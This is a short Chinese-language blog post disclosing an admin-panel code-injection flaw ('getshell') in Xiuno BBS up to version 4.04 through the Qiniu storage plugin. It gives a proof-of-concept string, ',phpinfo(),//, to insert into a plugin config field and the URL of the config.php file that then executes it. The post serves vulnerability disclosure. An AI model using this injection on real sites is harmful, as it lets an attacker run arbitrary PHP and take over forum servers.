xiuno最新后台Getshell


前言

Xiuno BBS 4.0 是一款轻论坛产品,前端基于 BootStrap 4.0、JQuery 3,后端基于 PHP/7 MySQL XCache/Yac/Redis/Memcached…

自适应手机、平板、PC,有着非常方便的插件机制,不仅仅是一个轻论坛,还是一个良好的二次开发平台。

本想把前台的洞也发出来 但是利用方法有点偏激 所以只写后台 漏洞影响至最新4.04版本

正文

进入后台-插件-下载七牛云存储 下载安装完成 如下图

随后 随便在一个配置里面插入 ',phpinfo(),//

随即访问

http://127.0.0.1//plugin/yb_qiniu/config.php

------ 本文结束 ------

本文标题:xiuno最新后台Getshell

文章作者:Fi9Coder

发布时间:2019年08月20日 - 17:08

最后更新:2019年08月20日 - 17:08

原始链接:http://www.safeinfo.me/2019/08/20/xiuno最新后台Getshell.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

Fi9Coder wechat
扫一扫,加入信安圈。
0%